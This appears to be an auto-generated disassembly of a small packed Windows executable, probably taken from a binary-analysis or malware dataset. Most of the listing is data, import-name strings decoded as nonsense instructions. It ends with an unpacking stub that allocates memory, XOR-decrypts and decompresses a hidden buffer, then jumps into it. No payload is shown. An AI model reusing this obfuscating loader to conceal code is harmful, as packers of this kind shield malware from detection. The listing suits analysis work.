_start
add eax 0x0
add ebx 0x0
pushad
nop
nop
je rwxdata
nop
jne rwxdata
call sub_406428
xchg esp eax
pushad
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
cwde
pushad
add [ eax ] al
xchg esp eax
pushad
add [ eax ] al
mov edx 0x60
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax - 0x45ffff9d ] ch
pushad
add [ eax ] al
cmpsb [ esi ] [ edi ]
pushad
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
stosb [ edi ]
pushad
add [ eax ] al
cmpsb [ esi ] [ edi ]
pushad
add [ eax ] al
mov dh 0x63
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
mov edx 0xb6000063
arpl [ eax ] ax
add al cl
arpl [ eax ] ax
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add ah cl
arpl [ eax ] ax
add al cl
arpl [ eax ] ax
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ ebp + 0x59 ] cl
dec ebp
push ebx
push esi
inc ebx
push edx
push esp
insb
insb
add [ eax ] al
add [ eax ] al
add [ eax ] al
dec ebp
pop ecx
inc ecx
inc esp
push esi
inc ecx
push eax
dec ecx
xor esi [ edx ]
insb
insb
add [ eax ] al
inc esi
popad
add [ eax ] al
pop eax
popad
add [ eax ] al
insb
popad
add [ eax ] al
jl rwxdata
nop
jne rwxdata
nop
jmp rwxdata
add [ esi ] bh
arpl [ eax ] ax
add [ ebp + 0x63 ] cl
add [ eax ] al
arpl [ fs : eax ] ax
add [ ebx ] dh
add [ ebx + 0x63960000 ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
inc edi
je rwxdata
add [ eax ] al
nop
je rwxdata
add [ eax ] al
add [ ebp + 0x78 ] al
imul esi [ eax + edx * 2 + 0x72 ] 0x7365636f
jb rwxdata
add [ eax ] al
add [ ebp + 0x72 ] dl
insd
imul ebp [ esi + 0x61 ] 0x72506574
jae rwxdata
arpl [ ecx + 0x64 ] ax
jb rwxdata
add [ eax ] al
add [ edi + 0x65 ] al
je __import_name_1(KERNEL32:FreeEnvironmentStringsA)
outsd
arpl [ ebp + 0x73 ] sp
jae rwxdata
inc esi
jb rwxdata
jne rwxdata
outsb
add [ eax ] al
add [ eax ] al
inc edi
je rwxdata
je __export_name_ptr_table_1(KERNEL32:HeapDestroy)
inc ebp
push edi
add [ eax ] al
jb rwxdata
jae rwxdata
jb rwxdata
outsd
jne rwxdata
add [ eax ] al
dec eax
popad
outsb
jbe rwxdata
insd
outsb
je rwxdata
jb rwxdata
jo rwxdata
add [ eax ] al
add [ eax + 0x65 ] cl
popad
je rwxdata
insd
outsb
je rwxdata
je rwxdata
outsb
outsb
je rwxdata
add [ eax ] al
dec ebp
jne rwxdata
add [ edi + 0x69 ] dl
inc ebx
arpl [ ebp + 0x73 ] sp
jae rwxdata
outsd
dec eax
popad
outsb
insb
inc ecx
add [ eax ] al
add [ eax ] al
dec esp
outsd
popad
dec esp
imul esp [ edx + 0x72 ] 0x41797261
add [ eax ] al
add [ eax ] al
inc edi
je __export_name_ptr_table_1(KERNEL32:UnhandledExceptionFilter)
inc esi
jae rwxdata
jb rwxdata
jb rwxdata
je rwxdata
je __import_name_1(KERNEL32:RtlUnwind)
outsb
jae rwxdata
outsb
insd
add [ eax ] al
inc edx
jns rwxdata
add [ eax ] al
add [ ebx + 0x65 ] dl
je rwxdata
je rwxdata
je __export_name_ptr_table_1(KERNEL32:VirtualFree)
inc ebp
outsb
jbe rwxdata
add [ eax ] al
add [ ebp + 0x6e ] dl
push 0x6c646e61
inc ebp
js rwxdata
add [ eax ] al
push ebp
outsb
je rwxdata
inc edx
jns rwxdata
push eax
inc ecx
jb rwxdata
insb
insb
outsd
arpl [ eax ] ax
add [ eax ] al
add [ ebp + 0x75 ] cl
insb
je rwxdata
add [ gs : eax ] al
add [ eax ] al
dec eax
popad
jo rwxdata
outsb
insb
outsd
arpl [ eax ] ax
add [ eax ] al
add [ eax + 0x65 ] cl
popad
jo rwxdata
add [ eax ] al
push edx
je rwxdata
imul ebp [ esi + 0x67 ] 0x5773
popad
insb
inc esi
add [ eax ] al
push ebx
je __export_name_ptr_table_1(KERNEL32:VirtualFree)
add [ eax ] al
add [ eax ] al
je rwxdata
jns rwxdata
add [ gs : eax ] al
add [ eax ] al
push esi
popad
outsb
insb
inc ebx
outsd
add [ eax ] al
add [ eax ] al
push edi
imul esp [ ebp + 0x43 ] 0x54726168
imul ebp [ esi + 0x67 ] 0x5773
imul esi [ edx + 0x74 ] 0x466c6175
add [ eax ] al
inc edi
imul ebp [ esi + 0x67 ] 0x4173
jne rwxdata
jb rwxdata
jb __import_name_1(KERNEL32:GetStdHandle)
jo rwxdata
je rwxdata
jb rwxdata
add [ ebp + 0x59 ] cl
push esp
outsd
popad
push 0x7261
inc ebx
push eax
add [ eax ] al
add [ eax ] al
inc edi
je rwxdata
add [ edi + 0x65 ] al
je rwxdata
inc ecx
jne rwxdata
push edi
push ebx
inc ebp
jb __import_dll_name(KERNEL32)
jb rwxdata
add [ eax ] al
dec esp
inc ebx
dec ebp
add [ eax ] al
push ebp
outsb
ja rwxdata
dec eax
add [ eax ] al
inc esi
jb rwxdata
imul ebp [ esi + 0x67 ] 0x4173
add [ eax ] al
add [ eax + 0x65 ] cl
popad
push ebx
outsb
jbe rwxdata
imul ebp [ ebp ] 0x47000000
je rwxdata
inc esi
je rwxdata
imul ebp [ ebp + 0x54 ] 0x657079
je __import_name_1(KERNEL32:RtlUnwind)
outsb
inc edi
outsd
imul ebp [ edi + 0x6e ] 0x746c6946
jb rwxdata
je rwxdata
outsd
outsb
inc esi
imul ebp [ esp + esi * 2 + 0x65 ] 0x72
insb
jne rwxdata
push edx
xor esi [ edx ]
insb
insb
add [ eax ] al
add [ eax ] al
add [ eax ] al
dec ebp
pop ecx
je rwxdata
inc ebx
dec ebp
insb
inc ebp
dec ebp
inc ebx
push eax
add [ eax ] al
add [ eax ] al
push esi
imul esi [ edx + 0x74 ] 0x416c6175
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
mov dh 0x4
add [ eax ] al
push esi
je rwxdata
insb
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi [ edx ]
insb
insb
add [ eax ] al
add [ eax ] al
add [ eax ] al
dec ebp
pop ecx
push ebp
push edi
imul esp [ ebp + 0x43 ] 0x726168
imul eax [ edx + 0x79 ] 0x6f546574
add [ gs : eax ] al
add [ eax ] al
add [ eax ] al
add [ ebx + eax * 2 + 0x4d ] cl
outsb
add [ fs : eax ] al
add [ eax ] al
push edi
jb rwxdata
dec ecx
outsb
outsw
add [ eax ] al
add [ eax ] al
inc edi
je rwxdata
jb rwxdata
add [ eax ] al
inc edi
je rwxdata
dec eax
popad
outsb
insb
add [ gs : eax ] al
jo rwxdata
add [ eax ] al
add [ eax ] al
dec eax
popad
jb rwxdata
add [ eax ] al
add [ edi + 0x65 ] al
je __import_name_1(KERNEL32:RtlUnwind)
je rwxdata
add [ edi + 0x65 ] al
je rwxdata
add [ eax ] al
add [ eax ] al
inc edi
je rwxdata
add [ eax ] al
push 0x6f547261
outsd
jne rwxdata
dec ecx
outsb
outsw
inc ecx
add [ eax ] al
add [ eax ] al
inc edi
je rwxdata
pop es
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ edx - 0xcfffffb ] ah
popad
jo rwxdata
imul ebp [ esi + 0x67 ] 0x41
add [ ebx + eax * 2 + 0x4d ] cl
push ebx
dec edi
inc ebx
dec ebx
xor esi [ edx ]
insb
insb
add [ eax ] al
add [ eax ] al
je rwxdata
insb
insb
outsd
arpl [ eax ] ax
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
popad
insb
inc ecx
imul ebp [ esi + 0x67 ] 0x65707954
push edi
add [ eax ] al
je rwxdata
popad
inc ebx
outsb
insd
inc esi
imul ebp [ ebp + 0x4e ] 0x41656d61
add [ eax ] al
add [ eax ] al
insb
je rwxdata
jb rwxdata
imul esi [ edx + 0x74 ] 0x416c6175
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
imul ebp [ esi + 0x67 ] 0x57
add [ edi + 0x65 ] al
je rwxdata
jo rwxdata
add [ eax ] al
add [ edi + 0x65 ] al
je rwxdata
jb rwxdata
outsb
jbe rwxdata
inc ebp
imul ebp [ edi + 0x6e ] 0x0
inc ebp
js rwxdata
add [ eax ] al
or [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
mov [ 0xfffffffff3000005 ] al
je rwxdata
je rwxdata
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ esi + 0x56000004 ] dh
imul ebp [ esi + 0x67 ] 0x65707954
inc ecx
add [ eax ] al
add [ eax ] al
inc edi
je rwxdata
je rwxdata
jb rwxdata
outsb
je rwxdata
jae rwxdata
arpl [ ebp + 0x73 ] sp
sub_406428
pop ebp
add ebp 0xffffffe4
mov eax [ ebp + 0x420 ]
or eax eax
je rwxdata
inc [ ebp + 0x420 ]
mov eax [ esp + 0x24 ]
mov [ ebp + 0x41c ] eax
lea esi [ ebp + 0x3a8 ]
push esi
call [ ebp + 0xbe ]
lea esi [ ebp + 0x40b ]
push esi
push eax
call [ ebp + 0xba ]
mov [ ebp + 0x418 ] eax
push 0x4
push 0x1000
push [ ebp + 0x3eb ]
push 0x0
call [ ebp + 0x418 ]
push eax
mov [ ebp + 0x424 ] eax
mov ebx [ ebp + 0x3e7 ]
add ebx ebp
push ebx
push [ ebp + 0x407 ]
call sub_4064ac
push eax
push ebx
call sub_4064d3
pop edx
push ebp
jmp edx
push ebp
jmp [ ebp + 0x424 ]
sub_4064ac
pushad
mov ecx [ esp + 0x24 ]
mov esi [ esp + 0x28 ]
mov ah 0x0
mov al [ esi ]
sub al ah
xor al 0x25
mov dl al
shl al 0x4
shr dl 0x4
add dl al
mov [ esi ] dl
inc esi
inc ah
dec ecx
jne rwxdata
popad
retn 0x8
sub_4064d3
pushad
mov esi [ esp + 0x24 ]
mov edi [ esp + 0x28 ]
cld
mov dl 0x80
xor ebx ebx
movsb [ edi ] [ esi ]
mov bl 0x2
xor ecx ecx
call sub_406576
nop
jae rwxdata
nop
call sub_406585
nop
sub ecx ebx
nop
jne rwxdata
nop
xor eax eax
nop
call sub_406576
nop
jae rwxdata
nop
xchg ecx eax
dec eax
shl eax 0x8
lodsb [ esi ]
nop
call sub_406582
nop
cmp eax 0x7d00
jae rwxdata
call sub_406582
nop
jmp rwxdata
nop
lodsb [ esi ]
nop
shr eax 0x1
nop
je rwxdata
nop
mov bl 0x2
nop
inc ecx
mov al 0x10
nop
inc ecx
nop
cmp ah 0x5
jae rwxdata
mov eax ebp
nop
mov bl 0x1
sub edi [ esp + 0x28 ]
nop
mov [ esp + 0x1c ] edi
popad
retn 0x8
nop
adc ecx ecx
nop
jmp rwxdata
nop
call sub_406576
nop
adc al al
nop
jae rwxdata
nop
jne rwxdata
call sub_406576
jae rwxdata
nop
inc ecx
cmp eax 0x7f
ja rwxdata
nop
push esi
mov esi edi
sub esi eax
[ edi ] [ esi ]
pop esi
nop
jmp rwxdata
stosb [ edi ]
jmp rwxdata
nop
xchg ebp eax
sub_406576
add dl dl
jne rwxdata
retn
nop
mov dl [ esi ]
inc esi
adc dl dl
nop
sub_406582
nop
xor ecx ecx
sub_406585
inc ecx
call sub_406576
adc ecx ecx
call sub_406576
jb rwxdata
retn
